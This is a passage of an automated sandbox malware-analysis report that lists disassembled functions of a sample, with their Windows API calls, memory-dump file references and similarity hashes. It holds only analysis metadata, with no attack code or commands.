                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                              • String ID:
                                                              • API String ID: 2833360925-0
                                                              • Opcode ID: abbf79e6ca8966198405ee16368aa0a3b42a279316edb76f8febc660b28b6b30
                                                              • Instruction ID: f24d92491f2fc79c3faf77e46db80ecf59647194c4bde59e2cd18d95f87ed613
                                                              • Opcode Fuzzy Hash: abbf79e6ca8966198405ee16368aa0a3b42a279316edb76f8febc660b28b6b30
                                                              • Instruction Fuzzy Hash: 85011735C04A2DABDF00EFE9EC48AEDBB78FF08791F120495E642B3150DB349A5087A1
                                                              Function 00AEAAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AEAADA
                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AEAAE4
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AEAAF3
                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AEAAFA
                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AEAB10
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 44706859-0
                                                              • Opcode ID: 600e19db99154a82663f106c5917fb2a5ab8f1c1be39bcaa4deea54c0ac22fbb
                                                              • Instruction ID: 582bb5ed48dc9845c026927a8870f52147fa83e581b9f35aed71340df8a7e62d
                                                              • Opcode Fuzzy Hash: 600e19db99154a82663f106c5917fb2a5ab8f1c1be39bcaa4deea54c0ac22fbb
                                                              • Instruction Fuzzy Hash: E5F04F752002087FEB111FA5FC88EAB3B6DFF55754F100029F941D7190CA60EC119A61
                                                              Function 00AEAA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AEAA79
                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AEAA83
                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AEAA92
                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AEAA99
                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AEAAAF
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 44706859-0
                                                              • Opcode ID: b0f341ac9f3acfa123a12cab0f68e9f8191744c6b4b406d75f190e971d037c31
                                                              • Instruction ID: 8aa6567a8fa410c451458f58acc4227b18d4027909de4fb8ecfd6fcf7c599a11
                                                              • Opcode Fuzzy Hash: b0f341ac9f3acfa123a12cab0f68e9f8191744c6b4b406d75f190e971d037c31
                                                              • Instruction Fuzzy Hash: 62F04F762003047FEB115FA5AC89EAB3BACFF49794F500429F941D7190DA60EC51DA61
                                                              Function 00AEEC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00AEEC94
                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00AEECAB
                                                              • MessageBeep.USER32(00000000), ref: 00AEECC3
                                                              • KillTimer.USER32(?,0000040A), ref: 00AEECDF
                                                              • EndDialog.USER32(?,00000001), ref: 00AEECF9
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                              • String ID:
                                                              • API String ID: 3741023627-0
                                                              • Opcode ID: 694873d6ca4d97e9ce28b522fc977882fa0793408b34c5075de52efe5a9922be
                                                              • Instruction ID: 32cc720013f2a93fb60e0ba7acc10fa3d38893c5f6391dcfa6f3fd70b01826ab
                                                              • Opcode Fuzzy Hash: 694873d6ca4d97e9ce28b522fc977882fa0793408b34c5075de52efe5a9922be
                                                              • Instruction Fuzzy Hash: 6001A430500744EBEB249B21EE4EB9A77BCFF50705F200559B693A24E1DFF4AA54CB80
                                                              Function 00ACB0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • EndPath.GDI32(?), ref: 00ACB0BA
                                                              • StrokeAndFillPath.GDI32(?,?,00B2E680,00000000,?,?,?), ref: 00ACB0D6
                                                              • SelectObject.GDI32(?,00000000), ref: 00ACB0E9
                                                              • DeleteObject.GDI32 ref: 00ACB0FC
                                                              • StrokePath.GDI32(?), ref: 00ACB117
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                              • String ID:
                                                              • API String ID: 2625713937-0
                                                              • Opcode ID: 06f7bb7f3cf5597c64b4e87fde2b5f505e2e2a2bf43292a89b025dca20d1eba0
                                                              • Instruction ID: 56ec6eec369567d6128b8807f00cd48431ca446303ffe7f30245e05695029502
                                                              • Opcode Fuzzy Hash: 06f7bb7f3cf5597c64b4e87fde2b5f505e2e2a2bf43292a89b025dca20d1eba0
                                                              • Instruction Fuzzy Hash: 01F0B630010644AFDB259F6DEC0AB593B65B710762F188719E4698A0F0CB318999EF60
                                                              Function 00AFF23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 00AFF2DA
                                                              • CoCreateInstance.OLE32(00B3DA7C,00000000,00000001,00B3D8EC,?), ref: 00AFF2F2
                                                              • CoUninitialize.OLE32 ref: 00AFF555
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CreateInitializeInstanceUninitialize
                                                              • String ID: .lnk
                                                              • API String ID: 948891078-24824748
                                                              • Opcode ID: 7ad2738cd740685668a13c42a047b4eb12e280195e6a15661392369529db1588
                                                              • Instruction ID: 4e429a18babb0db24ac7652ed80a60615ebc150c20e656b1f9d2c4cbf3f67c76
                                                              • Opcode Fuzzy Hash: 7ad2738cd740685668a13c42a047b4eb12e280195e6a15661392369529db1588
                                                              • Instruction Fuzzy Hash: 00A11B71108205AFD300EFA4C991EAFB7ECEF98714F00495DF6559B1A2EB70EA49CB52
                                                              Function 00AFE7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00AB660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AB53B1,?,?,00AB61FF,?,00000000,00000001,00000000), ref: 00AB662F
                                                              • CoInitialize.OLE32(00000000), ref: 00AFE85D
                                                              • CoCreateInstance.OLE32(00B3DA7C,00000000,00000001,00B3D8EC,?), ref: 00AFE876
                                                              • CoUninitialize.OLE32 ref: 00AFE893
                                                                • Part of subcall function 00AB936C: __swprintf.LIBCMT ref: 00AB93AB
                                                                • Part of subcall function 00AB936C: __itow.LIBCMT ref: 00AB93DF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                              • String ID: .lnk
                                                              • API String ID: 2126378814-24824748
                                                              • Opcode ID: f3270b0478269d13015f716c1f0e36131c61c2a825bf25033129ba0fa1df676e
                                                              • Instruction ID: c6990557a3c3e1e1ea04a6d7bd845dbc65284c306671d8187175c2cf9cda5bfb
                                                              • Opcode Fuzzy Hash: f3270b0478269d13015f716c1f0e36131c61c2a825bf25033129ba0fa1df676e
                                                              • Instruction Fuzzy Hash: 5AA146356043059FCB14EF54C984D6EBBE9BF88310F148999FA959B3A2CB31EC45CB91
                                                              Function 00AD325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __startOneArgErrorHandling.LIBCMT ref: 00AD32ED
                                                                • Part of subcall function 00ADE0D0: __87except.LIBCMT ref: 00ADE10B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ErrorHandling__87except__start
                                                              • String ID: pow
                                                              • API String ID: 2905807303-2276729525
                                                              • Opcode ID: c51821e0fd053d12d8a1f7df595c46320ea55bb02bf05305026e45acd0439151
                                                              • Instruction ID: 8b362ee44dd1fc5a66e730e4f61420d93d050c491e1f032b469b42d047eacc29
                                                              • Opcode Fuzzy Hash: c51821e0fd053d12d8a1f7df595c46320ea55bb02bf05305026e45acd0439151
                                                              • Instruction Fuzzy Hash: DB513A72A0820196CF15F714CA413BE7BA4AB51710F608E6BF4D78A3A9DE748EC49643
                                                              Function 00AF4606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00B4DC50,?,0000000F,0000000C,00000016,00B4DC50,?), ref: 00AF4645
                                                                • Part of subcall function 00AB936C: __swprintf.LIBCMT ref: 00AB93AB
                                                                • Part of subcall function 00AB936C: __itow.LIBCMT ref: 00AB93DF
                                                              • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00AF46C5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper$__itow__swprintf
                                                              • String ID: REMOVE$THIS
                                                              • API String ID: 3797816924-776492005
                                                              • Opcode ID: 0e1386a7b4b9f385b0fcf77bd2a65d17323271fd4f7ec7880ee949027a2ba8c7
                                                              • Instruction ID: 71634ae955cb596eaf15ad750b806ff01459fd7357a453528d38fd5e20bee851
                                                              • Opcode Fuzzy Hash: 0e1386a7b4b9f385b0fcf77bd2a65d17323271fd4f7ec7880ee949027a2ba8c7
                                                              • Instruction Fuzzy Hash: 2C412E35A0021D9FCF01EFA4C981ABEB7B9FF49314F148459FA16AB2A2DB349D45CB50
                                                              Function 00AEC189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00AF430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AEBC08,?,?,00000034,00000800,?,00000034), ref: 00AF4335
                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00AEC1D3
                                                                • Part of subcall function 00AF42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AEBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00AF4300
                                                                • Part of subcall function 00AF422F: GetWindowThreadProcessId.USER32(?,?), ref: 00AF425A
                                                                • Part of subcall function 00AF422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00AEBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00AF426A
                                                                • Part of subcall function 00AF422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00AEBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00AF4280
                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00AEC240
                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00AEC28D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                              • String ID: @
                                                              • API String ID: 4150878124-2766056989
                                                              • Opcode ID: 9cf3078befc41181f45eff38fc309bc85509ae8a8b399836ea1ad22b28049cfb
                                                              • Instruction ID: 6c8dee348b9ab9447db3f3a79dfb07555bb1c30f44609cc9732546326eaef546
                                                              • Opcode Fuzzy Hash: 9cf3078befc41181f45eff38fc309bc85509ae8a8b399836ea1ad22b28049cfb
                                                              • Instruction Fuzzy Hash: CF41497690021CAFDB10EFA4CD82EEEBBB8BF09310F104195FA55B7181DA71AE45CB61
                                                              Function 00B1A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00B4DC00,00000000,?,?,?,?), ref: 00B1A6D8
                                                              • GetWindowLongW.USER32 ref: 00B1A6F5
                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B1A705
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$Long
                                                              • String ID: SysTreeView32
                                                              • API String ID: 847901565-1698111956
                                                              • Opcode ID: e12370a5bcc5bd9093c52649f6404f0b6de66281eca466992a0cb5181c551b28
                                                              • Instruction ID: b29db7f96a5b632d113c53056d8ec86626cdcaf09b7c2c1453f59e7d40f0ff10
                                                              • Opcode Fuzzy Hash: e12370a5bcc5bd9093c52649f6404f0b6de66281eca466992a0cb5181c551b28
                                                              • Instruction Fuzzy Hash: 9031AF31201605AFDB118F38DC41BEA77A9FB49324F254769F879932E0DB70ED909B60
                                                              Function 00B1A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00B1A15E
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00B1A172
                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B1A196
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window
                                                              • String ID: SysMonthCal32
                                                              • API String ID: 2326795674-1439706946
                                                              • Opcode ID: 5e68809beaa652c88774b9d7631938edda3644126c3819ffb0fa1a4d80e701b0
                                                              • Instruction ID: 7d65bb85836cae1ca59e5600d791d6d8d93bbc2a0231a4825ecc41d482b4329e
                                                              • Opcode Fuzzy Hash: 5e68809beaa652c88774b9d7631938edda3644126c3819ffb0fa1a4d80e701b0
                                                              • Instruction Fuzzy Hash: F4217E32510218BBDF118E94CC42FEA3BA9EF49714F110254FA557B190D675A8958BA0
                                                              Function 00B1A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00B1A941
                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00B1A94F
                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B1A956
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$DestroyWindow
                                                              • String ID: msctls_updown32
                                                              • API String ID: 4014797782-2298589950
                                                              • Opcode ID: f6b93e9573cd47ccef1f78abdf0b8e9d048e246c3a1caab885db22749f388bdd
                                                              • Instruction ID: 2a79cdb2559235f3f6488ceebe75be50f4e7ae875005e04289fb50c6dd9cb2f9
                                                              • Opcode Fuzzy Hash: f6b93e9573cd47ccef1f78abdf0b8e9d048e246c3a1caab885db22749f388bdd
                                                              • Instruction Fuzzy Hash: 93218EB5600209AFDB10DF28DCD2DA737EDEB5A3A4B450599FA149B261CB30EC918B61
                                                              Function 00B199A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B19A30
                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B19A40
                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B19A65
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$MoveWindow
                                                              • String ID: Listbox
                                                              • API String ID: 3315199576-2633736733
                                                              • Opcode ID: 364352712c94ecff65408fb33bafc2f63dcca4661c7d56bbf97f4c07c2a1509b
                                                              • Instruction ID: 49c39b7fee10b236b365f5cf58aefad54cd8ccbc6630480ff2ddb02b133dd228
                                                              • Opcode Fuzzy Hash: 364352712c94ecff65408fb33bafc2f63dcca4661c7d56bbf97f4c07c2a1509b
                                                              • Instruction Fuzzy Hash: 0E21C232610118BFDB218F54DC95FFF3BEAEF89790F518168F9549B1A0CA719C9187A0
                                                              Function 00B1A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B1A46D
                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B1A482
                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B1A48F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: msctls_trackbar32
                                                              • API String ID: 3850602802-1010561917
                                                              • Opcode ID: fb6e3c9a13379c7bc40a381e959827659894e50984239306d9472721dab26a1a
                                                              • Instruction ID: fa065b1ac3fbff059537aa65847efb7208c6bccfa4891cb6319d9fcbdc179369
                                                              • Opcode Fuzzy Hash: fb6e3c9a13379c7bc40a381e959827659894e50984239306d9472721dab26a1a
                                                              • Instruction Fuzzy Hash: 54110A71200208BEEF205F65CC46FEB3BA9EF89754F024128FA5596191D6B1E851C720
                                                              Function 00AD2287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
